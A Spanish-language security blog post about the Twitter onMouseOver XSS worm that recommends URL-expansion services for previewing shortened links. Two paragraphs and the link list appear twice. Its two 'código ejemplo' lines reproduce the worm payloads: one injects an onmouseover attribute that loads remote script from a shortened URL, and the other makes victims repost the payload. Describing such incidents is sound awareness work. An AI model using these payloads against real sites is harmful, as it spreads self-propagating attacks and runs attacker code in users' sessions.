Hoy en día Twitter está siendo uno de los principales objetivos para explotar nuevas vulnerabilidades y probar diversos tipos de ataques. Sirva de ejemplo el último y reciente XSS que, aunque ya ha sido corregido, ha podido afectar en tan sólo unas horas a muchos usuarios simplemente pasando el cursor del ratón por encima del tuit malicioso (onMouseOver):
Sin embargo muchas veces no es necesario ninguna vulnerabilidad para que seamos redireccionados a un sitio malicioso... simplemente pinchamos una URL acortada con demasiada ligereza.
Hablamos por tanto de la importancia del "agrandamiento" de URLs que han sido previamente acortadas. No seáis mal pensad@s...X-), se trata de previsualizar el nombre completo del enlace para que, en la medida de lo posible, podamos identificar un sitio sospechoso o aparentemente no demasiado confiable.
Para ello y al igual que existen servicios online gratuitos para la reducción de URLs también existen servicios para expandirlos y previsualizar a dónde vamos a ser redirigidos. Y no sólo eso, además estos servicios incluyen algunas utilidades o herramientas como extensiones de Firefox, scripts de Greasemonkey e incluso APIs para desarrolladores web. Todas ellas nos facilitarán de forma transparente la previsualización de URLs.
En definitiva, nunca está de más tomar medidas de seguridad así que a continuación os dejo unos cuantos enlaces por si quereis utilizar estos servicios:
- Long URL Please![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpugb74uwg5wB1uuGTGN9yDhjzUaC8pG_kdwN9EdfOdYIcjqPdfbF4XRypGe28855lv3WSvoIhdt9oiMAqLCbX963cy6c24bUh9AQm59qqyUmQKh96XY30_m6-keMcgEgNm75N2TezcKLK/s400/longurlplease.jpg)
- LongURL
- ExpandMyURL
- RealURL
- Sucuri
- Untr.im
- Voizle
- Unshortn
código ejemplo 1:
$('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
$('.status-update-form').submit();
código ejemplo 2:
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()
Sin embargo muchas veces no es necesario ninguna vulnerabilidad para que seamos redireccionados a un sitio malicioso... simplemente pinchamos una URL acortada con demasiada ligereza.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVRMSFhy9BHEfm73o9sGwA7uOXnB6Zq6SPEYplKEL5o63XUVulWOo9UoyFvvOON-SOySGL_9cK4TuddUKhEybQlEQGDo7EAOLLoOfPZB7RCYrnwu91Ya4s6v9JbRhCnDk4erZU37oX95N5/s320/enlargeyour...jpg)
Para ello y al igual que existen servicios online gratuitos para la reducción de URLs también existen servicios para expandirlos y previsualizar a dónde vamos a ser redirigidos. Y no sólo eso, además estos servicios incluyen algunas utilidades o herramientas como extensiones de Firefox, scripts de Greasemonkey e incluso APIs para desarrolladores web. Todas ellas nos facilitarán de forma transparente la previsualización de URLs.
En definitiva, nunca está de más tomar medidas de seguridad así que a continuación os dejo unos cuantos enlaces por si quereis utilizar estos servicios:
- Long URL Please
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpugb74uwg5wB1uuGTGN9yDhjzUaC8pG_kdwN9EdfOdYIcjqPdfbF4XRypGe28855lv3WSvoIhdt9oiMAqLCbX963cy6c24bUh9AQm59qqyUmQKh96XY30_m6-keMcgEgNm75N2TezcKLK/s400/longurlplease.jpg)
- LongURL
- ExpandMyURL
- RealURL
- Sucuri
- Untr.im
- Voizle
- Unshortn
Comentarios
Publicar un comentario